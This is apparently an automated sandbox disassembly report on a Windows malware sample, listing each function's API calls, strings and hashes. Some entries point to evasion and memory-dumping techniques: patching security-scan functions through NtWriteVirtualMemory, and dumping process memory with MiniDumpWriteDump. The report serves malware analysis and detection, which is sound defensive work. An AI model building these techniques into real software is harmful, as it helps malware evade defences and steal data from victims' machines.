bcrypt, xrefs: 0290A3B0, 0290A3C4, 0290A3D8
NtOpenProcess, xrefs: 0290A6DB
ScanString, xrefs: 02908C3A, 02908DE5, 02908F93, 029093BB, 029095A1, 02909728, 02909BB5, 02909D73, 02909EE3, 0290A056, 0290A341, 0290A3EE
MiniDumpReadDumpStream, xrefs: 0290A560
BCryptQueryProviderRegistration, xrefs: 0290A3BF
ntdll, xrefs: 0290A45D, 0290A471, 0290A529, 0290A6CC, 0290A6E0
Initialize, xrefs: 02908F22, 02909530, 029096B7, 02909AA0, 02909D02, 02909E72, 02909FE5, 0290A24A, 0290A57B
NtReadVirtualMemory, xrefs: 0290A458
I_QueryTagInformation, xrefs: 0290A538
UacScan, xrefs: 02908CAB, 02908EC3, 029094BF, 029098BB, 02909A2F, 0290A1D9, 0290A671
MiniDumpWriteDump, xrefs: 0290A54C
sppc, xrefs: 029091AE
OpenSession, xrefs: 02908BE1, 02909004, 029090B6, 0290A487, 0290A5CD
advapi32, xrefs: 0290A53D
NtOpenObjectAuditAlarm, xrefs: 0290A46C, 0290A524
ScanBuffer, xrefs: 02908D04, 02908D8C, 02909127, 0290923C, 029092D9, 02909612, 02909799, 0290992C, 02909B11, 02909C26, 02909DE4, 02909F54, 0290A0C7, 0290A2BB, 0290A4D9, 0290A61F
BCryptVerifySignature, xrefs: 0290A3AB
UacInitialize, xrefs: 02908E6A, 029091CB, 0290934A, 0290944E, 0290A168
BCryptRegisterProvider, xrefs: 0290A3D3

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Library$AddressContextFreeHandleLoadModuleProcThread
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 1116111917-51457883
Opcode ID: 883b28f1fb3248feb3990cf87c39a669d701722945a3fe66890becc23f8e12e3
Instruction ID: 5ed40184e716501653faad550fcb3a9d6c7aa2367fecb3415e20a96b3b947820
Opcode Fuzzy Hash: 883b28f1fb3248feb3990cf87c39a669d701722945a3fe66890becc23f8e12e3
Instruction Fuzzy Hash: 20E2F039B5021C9FDB51EB68CCD0ADF73FAAF85300F1081A29705E7265DA34AE858F56

Function 028F58B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F58D1
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028F58E8
lstrcpynA.KERNEL32(?,?,?), ref: 028F5918
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F597C
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F59B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F59C5
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F59D7
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000,0291E790), ref: 028F59E3
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8,028F0000), ref: 028F5A17
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6BC8), ref: 028F5A23
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 028F5A45

Strings

kernel32.dll, xrefs: 028F58CC
GetLongPathNameA, xrefs: 028F58DF
\, xrefs: 028F59F5

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 4f7b32f1560b7be0459198089f66e728366562fb6816279482b18ae9e2745fde
Instruction ID: 38aab01fd1c1f0d028f504e51116972167c3593b3228b816515407e2c0ef4397
Opcode Fuzzy Hash: 4f7b32f1560b7be0459198089f66e728366562fb6816279482b18ae9e2745fde
Instruction Fuzzy Hash: 14416D79E00659EFDB50DBE8CC88ADEB3BEAB08300F5445A5A648E7241E7349A548F60

Function 028F5B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5C97

Strings

Software\Borland\Delphi\Locales, xrefs: 028F5AE4
Software\Borland\Locales, xrefs: 028F5AA8, 028F5AC6

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction ID: 87274868c3c361739a8a37b654f07a6177889ee2f942c40ec36dd97383685f3b
Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction Fuzzy Hash: 7731A47DE4021CAAFB65D6F88C89FDFBBAD4B04380F4401E19708E6181DB789E848F91

Function 02908798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize,029523A4,0290A774,UacScan), ref: 029087AC
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029087C6
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize), ref: 02908802

Part of subcall function 02907CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C

Strings

bcrypt, xrefs: 029087AB
BCryptVerifySignature, xrefs: 029087BF

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 5b86e1d96a044001ea7b0d9b2419f05cc33aee9b61ab52e1a3bdb57d2bb10b69
Instruction ID: f37b6aa270519d87fafe9bfe44fec8b345f8c35ee64ee73a60c36cc1218b0175
Opcode Fuzzy Hash: 5b86e1d96a044001ea7b0d9b2419f05cc33aee9b61ab52e1a3bdb57d2bb10b69
Instruction Fuzzy Hash: 6CF0F671F8D3389EE310AF6DA884F36379CA786F14F00092ABE18C7180D77458208B50

Function 0290DF00 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 028F4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DFD2), ref: 0290DF3F
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DF79
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DFA6
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DFAF

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 8dfa724e05a6b120aac6601a331163c5ff0193b98602ab32b8b0d5b10bced1f2
Instruction ID: f6f17c8f1f7cf11f7033f84dbd39064f032e2b680eca035de6a8fa93f4979535
Opcode Fuzzy Hash: 8dfa724e05a6b120aac6601a331163c5ff0193b98602ab32b8b0d5b10bced1f2
Instruction Fuzzy Hash: 9C21AA76A4020DBEEB50EAE4CD86F9EB7BDEB44B00F504562B700F61D0D7B4AA048A65

Function 0290DE24 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 0290DEA0
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DEF2), ref: 0290DEB6
NtDeleteFile.NTDLL(?), ref: 0290DED5

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Path$DeleteFileInitNameName_StringUnicode
String ID:
API String ID: 1459852867-0
Opcode ID: e3d16f670cc4c521b86b03359e01da16fbed6ed0f94aef91e9cb11af0f13b8ef
Instruction ID: c9d7cbddc25c970a76ea05ce549ac8af789433c0cd966e58bddb8114c02eb329
Opcode Fuzzy Hash: e3d16f670cc4c521b86b03359e01da16fbed6ed0f94aef91e9cb11af0f13b8ef
Instruction Fuzzy Hash: 7D014F76A4424C6EEB05E6E08DC1BCEB7B9EF94700F5004E2A200E60D1DA746B088B31

Function 0290DE78 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 028F4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4EDA

RtlInitUnicodeString.NTDLL(?,?), ref: 0290DEA0
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DEF2), ref: 0290DEB6
NtDeleteFile.NTDLL(?), ref: 0290DED5

Part of subcall function 028F4C0C: SysFreeString.OLEAUT32(0290ED84), ref: 028F4C1A

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: d129fd8116cc080f03c2d81562d8f9fc9074643bb8d881800e0327259170ea18
Instruction ID: 838a7835625c2b0180434bcf59229959178f2625dfba53b92f9dd70e01479fc1
Opcode Fuzzy Hash: d129fd8116cc080f03c2d81562d8f9fc9074643bb8d881800e0327259170ea18
Instruction Fuzzy Hash: 9301E17594020CAEEB11EAE4CD81FDEB3BDDB98700F5044A2A704E25C0EB746B049A75

Function 028F7F54 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 028F7F75

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
Instruction ID: ee3196001682250348e113fbbcf0071aa664086810ffc21b4ecbbf884292e7f1
Opcode Fuzzy Hash: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
Instruction Fuzzy Hash: 731100B5A00209AF9B44CF9DC8809AFF7F9EFC8304B14C569A508EB254E6319A018B90

Function 028FA744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA762

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction ID: f045e92f734f4c510a34be3b06ca9de1cf7b1f17b44f976a8912b1f492594a3c
Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction Fuzzy Hash: ABE0927D70421817D355A56C9C80DE7736D975C710F10426AAB49C7341EDA09D444AE5

Function 028FB70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,0291D106,00000000,0291D11E), ref: 028FB71A

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: d7c976edfb19456290c99c0d5dd0c204742e3814f689ad9fab5e1a009d25843f
Instruction ID: e0bec6a21f7ba2c65a6f17e82abf623263ffd2e4accaac936580694ab64eb182
Opcode Fuzzy Hash: d7c976edfb19456290c99c0d5dd0c204742e3814f689ad9fab5e1a009d25843f
Instruction Fuzzy Hash: 61F0A4789483069FE394DF29D540A2677E9FF49714F004D29EAE9C7380E7349414CF52

Function 028FA790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,028FBDF2,00000000,028FC00B,?,?,00000000,00000000), ref: 028FA7A3

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction ID: ed9cfff661846aedbdcbdafee958a53152297682b6736eb8c629476247d23d17
Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction Fuzzy Hash: 02D05EAE30E2602AA224915B2D84D7B5BFCCAC57B1F00413EF68CC6201D2048C0596F1

Function 028F918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 028F9190

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction ID: 29e6ae53313c1002136837f493ef77d49cc9a46ee7208dae354d03b3527cf5d3
Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction Fuzzy Hash: E3A01108808830028A803B2C0C0223A3288A800A20FC80F80A8F8802E2FE2E022080E3

Function 028F20C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 028FD214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 028FD21D

Part of subcall function 028FD1E8: GetProcAddress.KERNEL32(00000000), ref: 028FD201

Strings

VarIdiv, xrefs: 028FD2C5
VarCmp, xrefs: 028FD333
VarNeg, xrefs: 028FD241
VarAdd, xrefs: 028FD26D
VariantChangeTypeEx, xrefs: 028FD22B
VarAnd, xrefs: 028FD2F1
VarXor, xrefs: 028FD31D
VarR4FromStr, xrefs: 028FD35F
VarCyFromStr, xrefs: 028FD3A1
VarBstrFromDate, xrefs: 028FD3E3
VarMod, xrefs: 028FD2DB
VarOr, xrefs: 028FD307
VarI4FromStr, xrefs: 028FD349
VarBstrFromBool, xrefs: 028FD3F9
VarR8FromStr, xrefs: 028FD375
VarBoolFromStr, xrefs: 028FD3B7
VarMul, xrefs: 028FD299
VarDiv, xrefs: 028FD2AF
VarDateFromStr, xrefs: 028FD38B
VarBstrFromCy, xrefs: 028FD3CD
VarNot, xrefs: 028FD257
oleaut32.dll, xrefs: 028FD218
VarSub, xrefs: 028FD283

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 457d71123bd7eb687d07ee989b04f3ae0a28071ccb23f033f81ee21b33d0b9ab
Instruction ID: affbcf3d5719f448bafed88a03a7cee67a77061e8996971d1c6e3aafe4976ed6
Opcode Fuzzy Hash: 457d71123bd7eb687d07ee989b04f3ae0a28071ccb23f033f81ee21b33d0b9ab
Instruction Fuzzy Hash: 3841936EF883185BD68CAB6D7400427BF9DD6987103A0841BFB04CB744DEA07E995B6A

Function 02906E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02906E5E
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02906E6F
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02906E7F
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02906E8F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02906E9F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02906EAF
GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02906EBF

Strings

CoInitializeEx, xrefs: 02906E79
CoSuspendClassObjects, xrefs: 02906EB9
CoAddRefServerProcess, xrefs: 02906E89
CoReleaseServerProcess, xrefs: 02906E99
CoResumeClassObjects, xrefs: 02906EA9
CoCreateInstanceEx, xrefs: 02906E69
ole32.dll, xrefs: 02906E59

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
